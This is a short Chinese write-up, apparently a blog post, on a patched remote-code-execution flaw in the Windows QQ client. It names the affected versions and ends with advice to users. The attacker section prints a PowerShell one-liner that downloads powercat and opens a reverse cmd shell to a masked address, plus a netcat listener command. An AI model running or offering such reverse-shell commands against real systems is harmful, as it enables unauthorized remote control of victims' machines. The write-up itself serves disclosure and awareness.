[赛博昆仑] 腾讯QQ_PC端,逻辑漏洞导致RCE漏洞

简介

!! 内容仅供学习,请不要进行非法网络活动,网络不是法外之地!!

赛博昆仑是国内一家较为知名的网络安全公司，该公司今日报告称 Windows 版腾讯 QQ 桌面客户端出现高危安全漏洞，据称“黑客利用难度极低、危害较大”，腾讯刚刚已经紧急发布了 9.7.15 版本 QQ，修复了该漏洞

攻击者视角

攻击者配置木马,这里使用powershell反弹会话模拟木马程序

@echo off powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c ?.?.?.? -p ????? -e cmd pause

本地发送一次

选择回复

最终Payload

转发给受害者
————————

nc -lvvp 10031

受害者点击回复内容后得到会话

受害者视角

受害者点击回复内容,直接下载并自动打开木马文件

总结

近期,不要点击陌生人发送任何具有诱惑力的回复信息(可能会和其他rar或pdf等漏洞打组合拳利用),及时更新PC端QQ版本,此漏洞问题影响 Windows 版 QQ 9.7.13 及之前版本,QQ NT 版本不受该漏洞影响,安卓端用户不受影响